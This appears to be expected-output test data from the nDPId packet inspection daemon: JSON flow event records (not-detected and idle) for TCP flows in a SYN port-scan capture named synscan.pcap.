-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 